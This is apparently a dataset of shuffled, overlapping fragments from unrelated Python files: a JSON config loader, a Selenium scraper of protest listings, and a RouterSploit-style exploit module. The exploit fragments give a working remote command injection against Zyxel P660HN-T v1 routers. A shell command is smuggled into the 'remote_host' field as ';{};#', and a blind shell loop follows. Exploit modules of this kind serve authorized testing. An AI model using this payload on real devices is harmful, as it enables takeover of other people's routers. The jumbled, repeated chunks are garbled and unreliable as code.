"in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in",
"configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s'",
"defaults to default_search_folders if not specified return the first path to file_name found",
"possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders",
"make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return",
"search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in",
"search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]",
"[ os.path.join(folder, file_name) for folder in search_folders ] return [ path for path",
"default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return [",
"''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0],",
"json data or None if file not found ''' actual_files = find_paths(file_name, app_name,",
"app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for",
"or None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if",
"not specified return the first path to file_name found ''' search_folders = search_folders",
"in search_folders return the loaded json data or None if file not found",
"search_folders defaults to default_search_folders if not specified return the first path to file_name",
"''' json.load(file_name) after finding file_name in search_folders return the loaded json data or",
"specified return the first path to file_name found ''' search_folders = search_folders or",
"def default_search_folders(app_name): ''' Return the list of folders to search for configuration files",
"found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with",
"% app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders",
"# make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): '''",
"json.load(file_name) after finding file_name in search_folders return the loaded json data or None",
"[ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def",
"% (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): '''",
"'/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given",
"the first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files",
"file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return",
"list of folders to search for configuration files ''' return [ '%s/cdis/%s' %",
"load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return the loaded json data",
"default_search_folders(app_name): ''' Return the list of folders to search for configuration files '''",
"for folder in search_folders ] return [ path for path in possible_files if",
"def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults to default_search_folders",
"json import os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')",
"search_folders) if not actual_files: return None with open(actual_files[0], 'r') as reader: return json.load(reader)",
"[ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name)",
"found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for",
"for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search",
"if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name in search_folders return",
"''' Search the given folders for file_name search_folders defaults to default_search_folders if not",
"None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders) if not",
"the loaded json data or None if file not found ''' actual_files =",
"possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return [ path",
"first path to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files =",
"= [ os.path.join(folder, file_name) for folder in search_folders ] return [ path for",
"for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding",
"file_name in search_folders return the loaded json data or None if file not",
"'/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name",
"folders for file_name search_folders defaults to default_search_folders if not specified return the first",
"search_folders ] return [ path for path in possible_files if os.path.exists(path) ] def",
"for file_name search_folders defaults to default_search_folders if not specified return the first path",
"path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): ''' json.load(file_name) after finding file_name",
"or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders ] return",
"files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' %",
"import os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def",
"return [ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): '''",
"data or None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders)",
"file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name)",
"if not specified return the first path to file_name found ''' search_folders =",
"'%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None):",
"to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s'",
"XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search for configuration",
"folder in search_folders ] return [ path for path in possible_files if os.path.exists(path)",
"file_name search_folders defaults to default_search_folders if not specified return the first path to",
"it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the",
"(XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search",
"given folders for file_name search_folders defaults to default_search_folders if not specified return the",
"Search the given folders for file_name search_folders defaults to default_search_folders if not specified",
"app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults",
"default_search_folders if not specified return the first path to file_name found ''' search_folders",
"os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name):",
"= search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders",
"testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search for",
"search_folders return the loaded json data or None if file not found '''",
"change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders",
"for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name,",
"to default_search_folders if not specified return the first path to file_name found '''",
"import json import os # make it easy to change this for testing",
"''' Return the list of folders to search for configuration files ''' return",
"file_name) for folder in search_folders ] return [ path for path in possible_files",
"to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder,",
"actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r')"
] |
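A minimal usage sketch for the loader above, assuming a hypothetical application named "myapp" whose configuration was installed into one of the default search folders (the app name, file name, and keys are invented for illustration):

# looks for creds.json in $XDG_DATA_HOME/cdis/myapp, /usr/share/cdis/myapp,
# and /var/www/myapp, in that order; first existing match wins
settings = load_json('creds.json', 'myapp')
if settings is None:
    # no search folder contained creds.json; fall back to defaults
    settings = {}
db_host = settings.get('db_host', 'localhost')  # hypothetical key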
[
"\"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\":",
"Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote",
"Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is",
"is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def",
"or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check():",
"routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T",
"it allows to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\",",
"method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\",",
"OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking",
"\"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If",
"command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to",
"vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it",
"path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text:",
"\"If the target is vulnerable it allows to execute commands on operating system",
"\"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command",
"} self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response =",
"loop...\") print_status(\"It is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\")",
"self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\"",
"\"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target =",
"} target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80,",
"from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1",
"port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\")",
") return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if",
"response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True return",
"commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME>",
"to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = {",
"the target is vulnerable it allows to execute commands on operating system level.\",",
"response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if",
"= self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL",
"self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request(",
"# vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\",",
"cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\",",
"{ \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\"",
"maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\":",
"<pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\",",
"payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def",
"Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable",
"data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", )",
"not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self,",
"return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response",
"print_status(\"It is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else:",
"architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload =",
"\"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel",
"P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\")",
"\";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\":",
"\"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data )",
"\"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": (",
"vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\":",
"\"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data",
"\"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\"",
"= OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\")",
") if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return",
"be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is",
"blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems",
"\"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address:",
"to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response",
"\"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute",
"\"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is",
"( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target",
"HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module",
"\" \"If the target is vulnerable it allows to execute commands on operating",
"execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery",
"level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module",
"IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if",
"import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\":",
"address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears",
"def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return",
"= \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\",",
"<marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": (",
"\"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in",
"maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\",",
"= { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution",
"method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\" in",
"be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\":",
"OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def",
"\"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self):",
"system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit",
"if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True",
"command loop...\") print_status(\"It is blind command injection - response is not available\") shell(self,",
"import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel",
"available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd):",
"injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be",
"devices. \" \"If the target is vulnerable it allows to execute commands on",
"is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target",
"= { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\":",
"# routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel",
"{ \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability",
"class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits",
"( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\":",
"\"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\",",
"), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port =",
"( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6",
"if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind",
"module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\",",
"P660HN-T v1 devices. \" \"If the target is vulnerable it allows to execute",
"data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload,",
"\"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request(",
"exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the",
"target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target",
"\"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\",",
"print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data",
"), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4",
"* from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T",
"target is vulnerable it allows to execute commands on operating system level.\", \"authors\":",
"operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", #",
"\"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self):",
"to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability",
"= OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\")",
"\"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), }",
"not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\",",
"in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it allows",
"vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is not",
"\"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or",
"@mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None:",
"from maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = {",
"vulnerable it allows to execute commands on operating system level.\", \"authors\": ( \"<NAME>",
"print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is not available\")",
"P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T",
"is vulnerable it allows to execute commands on operating system level.\", \"authors\": (",
"__info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command",
"print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection",
"\"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \"",
"\"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\",",
"RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices.",
"appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection -",
"Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it allows to",
"v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1",
"response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\")",
"else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd)",
"- response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not",
"discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ),",
"payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\":",
"def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It",
"\"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response",
"\"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" }",
"\"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target",
"def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\",",
"path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\",",
"\"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ),",
"\"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return",
"Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target",
"run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is",
"v1 devices. \" \"If the target is vulnerable it allows to execute commands",
"is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True return False",
"shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload",
"seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data =",
"port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be",
"check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False",
"allows to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", #",
"), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ),",
"execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\":",
"v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port",
"vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\",",
"on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\",",
"192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to",
"self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command",
"IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target"
] |
[
"numeric pagenum = pagenum + 1 # append data from this click locations",
"Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\"",
"1 pagenum = -1 while(pagenum < page_new): #click to next page if pagenum",
"import csv import codecs from bs4 import BeautifulSoup from selenium import webdriver from",
"#coverts from string to numeric pagenum = pagenum + 1 # append data",
"packages import time import itertools import csv import codecs from bs4 import BeautifulSoup",
"+ c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" +",
"# don't overflow website sleep(2) #update page numbers for while statement page_new =",
"# append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants",
"driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):",
"page_new = int(page_new, 10) #coverts from string to numeric pagenum = pagenum +",
"page_new = 1 pagenum = -1 while(pagenum < page_new): #click to next page",
"while(pagenum < page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() #",
"participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\")",
"c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text",
"= driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations,",
"webdriver from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver",
"#update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10)",
"\"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv import",
"Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1 pagenum =",
